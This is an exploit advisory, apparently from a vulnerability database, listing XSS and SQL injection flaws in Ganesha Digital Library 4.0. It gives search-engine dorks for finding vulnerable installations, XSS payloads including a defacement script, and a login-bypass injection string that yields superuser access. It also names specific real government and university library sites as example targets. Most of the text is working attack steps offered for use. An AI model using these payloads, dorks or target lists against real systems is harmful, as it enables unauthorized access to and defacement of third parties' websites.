Ganesha Digital Library 4.0 Cross Site Scripting / SQL Injection

2012.05.31
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

===================================================== Ganesha Digital Library 4.0 Multiple Vulnerabilities ===================================================== :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities : # Date : 30 May 2012 : # Author : X-Cisadane : # Software Link : kmrg.itb.ac.id : # Version : 4.x : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS Vulnerability : # Tested On : Mozilla Firefox 7.0.1 (Windows) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai,Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: Description : ============= Ganesha Digital Library (GDL) is a digital library software developed by Knowledge Management Research Group (KMRG) Institute of Technology Bandung (ITB) in order to harness the intellectual capital (intellectual capital) of ITB, which includes academic articles, journals, the final task, thesis, dissertation, research results, expertise and other directory. Dorks : ======= inurl:"/office.php?m=" intext:Copyright ? 2002-2003 - KMRG ITB. All rights reserved intext:This work was carried out with the aid of a grant from YLTI Indonesia and IDRC Canada. intitle:" - GDL 4.0" POC : ===== [1] NON-Persistent XSS in the Account Activation Section There is a security flaw (NON-Persistent XSS) in the Account Activation Section. For the example : Open http://digilib.litbang.depkes.go.id/ AND Click Activate Account in the left corner Menu. Then you'll be taken to Activate Account Page, Fill this script : '"><script>alert(1337)</script> on the Account Field and Code Field Then Click Activate. [2] NON-Persistent XSS in the Search Section XSS Script : '"><script>alert(1337)</script> For Example : http://www.djmbp.esdm.go.id/pustaka/search.php?s=[Insert XSS Script] [3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script] XSS Script : '"><script>alert(1337)</script> For Example : Type XSS Script like this ---> http://digilib.litbang.depkes.go.id/office.php?m=lang&langid='"><script>alert(1337)</script> AND PRESS ENTER! Then you'll be taken to Error Page. Then edit the URL like this ---> http://digilib.litbang.depkes.go.id/office.php?m=lang&langid=en AND PRESS ENTER! If it Successfull, it will appear a Message Box "1337" P.S : Login Required! [4] NON-Persistent XSS DEFACING XSS Script : http://digilib.litbang.depkes.go.id/publisher.php?id=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni, Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit http://xcode.or.id";</script> [5] SQL Injection on The Login Form (Gain SuperUser Access!) Open Ganesha Digital Library 4.0 Login Page For the example : Open http://adln.lib.unair.ac.id/login.php On the Account Field, Fill with this Symbol : '=0# On the Password Field Don't Fill Anything!!! Then Click Login Button. If it Successfull, you'll be got a Superuser GDL Access! You can try another site such as : http://digilib.litbang.depkes.go.id/login.php http://digilib.p3gizi.litbang.depkes.go.id/login.php http://digilib.p3skk.litbang.depkes.go.id/login.php [6] SQL Injection on go.php?id=['SQL] SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL] SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA BLA&start=['SQL] SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA BLA&start=START ID BLA BLA BLA&node=['SQL] For Example : http://digilib.litbang.depkes.go.id/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848 http://adln.lib.unair.ac.id/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785 http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a [7] SQL Injection on publisher.php?id=['SQL] For Example : http://digilib.litbang.depkes.go.id/publisher.php?id=%27JBPEDONFAU [8] SQL Injection on go.php?node=['SQL] For Example : http://digilib.litbang.depkes.go.id/go.php?node='191 http://digilib.p3gizi.litbang.depkes.go.id/go.php?node='25 http://digilib.p3skk.litbang.depkes.go.id/go.php?node='32 P.S : Login Required! [9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0 For Example : http://digilib.litbang.depkes.go.id/office.php?m=explorer&a='191&b=expand&w=0 http://digilib.p3gizi.litbang.depkes.go.id/office.php?m=explorer&a='25&b=expand&w=0 http://digilib.p3skk.litbang.depkes.go.id/office.php?m=explorer&a='16&b=expand&w=0 P.S : Login Required! [10] SQL Injection on office.php?m=user&a=['SQL] For Example : http://digilib.litbang.depkes.go.id/office.php?m=user&a='pdsony@idola.net.id&b=edit P.S : Login Required! [11] SQL Injction on office.php?m=workgroup&a=['SQL]&b=edit For Example : http://digilib.litbang.depkes.go.id/office.php?m=workgroup&a='1&b=edit P.S : Login Required! [12] SQL Injection on office.php?m=user&so=desc&sb=['SQL] For Example : http://digilib.litbang.depkes.go.id/office.php?m=user&so=desc&sb='FULL_NAME http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='EMAIL http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='GID http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='CONFIRM P.S : Login Required!

References:

http://kmrg.itb.ac.id/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top